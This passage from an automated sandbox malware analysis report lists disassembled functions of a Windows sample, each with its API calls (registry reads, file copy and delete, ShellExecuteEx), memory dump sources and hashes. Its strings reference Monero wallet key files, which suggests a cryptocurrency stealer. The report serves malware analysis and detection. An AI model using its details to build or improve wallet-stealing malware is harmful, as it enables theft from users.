                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00DF69C0
                              • ExitProcess.KERNEL32 ref: 00DF69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                              • Instruction ID: e94acc2b30b8bcef802bbdfbf79679f3e65cb68ea248a28e15d8aba097dd8286
                              • Opcode Fuzzy Hash: d10e4ff9dc64320d05a306bad998d112f535d7f6ff31e9231781dfaa829ce5e4
                              • Instruction Fuzzy Hash: 2F21EAB5D0020CABCF14EFE8D945AEEB7B5FF48300F14852AE506E3644EB759605CB69
                              Function 00DF7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0196B708,00000000,00020119,?), ref: 00DF7E5E
                              • RegQueryValueExA.ADVAPI32(?,0197D250,00000000,00000000,000000FF,000000FF), ref: 00DF7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00DF7E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                              • Instruction ID: 8cfc7337b9b1ccb971056ab8c4b1b9f00ede266f596c0c127521baf1a729f79a
                              • Opcode Fuzzy Hash: 9dd158a9868921dcd85eb946cb9ac7cf8095da07b40a628d6fb34bc6cc6f8a5d
                              • Instruction Fuzzy Hash: 8C118FB1A44209EBD724CF94DD4AFBBBBB8FB44710F20811AF755A7684DB7958008BA0
                              Function 00DF9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrStrA.SHLWAPI(0197EA58,?,?,?,00DF140C,?,0197EA58,00000000), ref: 00DF926C
                              • lstrcpyn.KERNEL32(0102AB88,0197EA58,0197EA58,?,00DF140C,?,0197EA58), ref: 00DF9290
                              • lstrlen.KERNEL32(?,?,00DF140C,?,0197EA58), ref: 00DF92A7
                              • wsprintfA.USER32 ref: 00DF92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                              • Instruction ID: 40c51b99f1894864d777b22474b0526c01cf0531ced158a6fb179e6848f95870
                              • Opcode Fuzzy Hash: 91ce0953d57380e27a286d4b034ed0ea4140ced4c64d86d4f8385fa8e26671b8
                              • Instruction Fuzzy Hash: F0011E75600108FFCB14DFECC998EAE7BB9FB48350F108548F9499B605CA35AA40DBA4
                              Function 00DE12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DE12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00DE12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00DE12F5
                              • RegCloseKey.ADVAPI32(?), ref: 00DE12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                              • Instruction ID: c31e0a8df0abaa9e233cad42ab802e30a7175c24ac536780b93c80fe4df52ac5
                              • Opcode Fuzzy Hash: 347fee172138133ea493035e84db50dff061a1cd8c7d4fc61951048300d8326e
                              • Instruction Fuzzy Hash: AD011DB9B40208FBDB24DFE0DC49FAEB7B8FB48701F108159FA4597284DA759A018B60
                              Function 00DFC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: ecedd904b9f26d9d1a15fce43594bcff0ce39a8254817a5d3bf71526900bfee8
                              • Instruction ID: c2176359513c8a8cce377307138472050577a09f93bb96d239d42b0cf9d31179
                              • Opcode Fuzzy Hash: ecedd904b9f26d9d1a15fce43594bcff0ce39a8254817a5d3bf71526900bfee8
                              • Instruction Fuzzy Hash: E64107B111075C5EDB218B24CE84FFB7BED9F45705F1894E8EACA86182E2719A54CF30
                              Function 00DF6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00DF6663
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00DF6726
                              • ExitProcess.KERNEL32 ref: 00DF6755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 4b85860e5a04faa85828634e2081da7c2e58f0b2f1b13c2116b88843e069b3d0
                              • Instruction ID: eaea38f9a2cad76c5e96ffe745a4c15e11ac327263ecd3edf6d24ad713b7caaa
                              • Opcode Fuzzy Hash: 4b85860e5a04faa85828634e2081da7c2e58f0b2f1b13c2116b88843e069b3d0
                              • Instruction Fuzzy Hash: E3310AB1901218AADB24EB54DC91BEE7778EF44300F808199F30966191DFB56B48CF7A
                              Function 00DF87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E00E28,00000000,?), ref: 00DF882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8836
                              • wsprintfA.USER32 ref: 00DF8850
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 6e0e4ecb755c00295438930d2f0f2a282c3e7f3a3d053f78b3ba32c6f67aead8
                              • Instruction ID: 77d5cc744c96cfec6a11752746254147416178e706ba7440c2b8e31acdfd5235
                              • Opcode Fuzzy Hash: 6e0e4ecb755c00295438930d2f0f2a282c3e7f3a3d053f78b3ba32c6f67aead8
                              • Instruction Fuzzy Hash: 3C2133B1F40208EFDB24DF94DD45FAEB7B8FB48711F204119F605A7684CB7999008BA1
                              Function 00DF8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00DF951E,00000000), ref: 00DF8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF8D62
                              • wsprintfW.USER32 ref: 00DF8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 0b1b56de4916ac1b6a02cc04570240e3ae51afa4adf4af32d8ad99ce0931871d
                              • Instruction ID: 1b0e725390b8b74671ef17ac4fc932e442e87b5a7eeaf470ae395b1bb6f23051
                              • Opcode Fuzzy Hash: 0b1b56de4916ac1b6a02cc04570240e3ae51afa4adf4af32d8ad99ce0931871d
                              • Instruction Fuzzy Hash: F6E08CB0B40208FBD724DF94DC0AE6977B8EB04702F104095FE4A97680DEB69E008BA5
                              Function 00DEA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DEA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00DEA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00DEA6BC
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00DEA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 86bbecd727f6926a560c3337923cac820a5a59ab6645df2d526272531e79aae9
                              • Instruction ID: 3a90e1082d0ba82b479ca769ea72f42bc577f3e666d0cb0dc85711e654eea5a1
                              • Opcode Fuzzy Hash: 86bbecd727f6926a560c3337923cac820a5a59ab6645df2d526272531e79aae9
                              • Instruction Fuzzy Hash: 8EE1FBB291011C9ACB14FBA8DC92EFE7338EF14340F51C169F61A76095EE746A49CB72
                              Function 00DED400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED481
                              • lstrlen.KERNEL32(00000000), ref: 00DED698
                              • lstrlen.KERNEL32(00000000), ref: 00DED6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00DED72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: c9f1af44e29dd47cbbbdcdc94c602c5034321782d3659a07a35c767b23a27f38
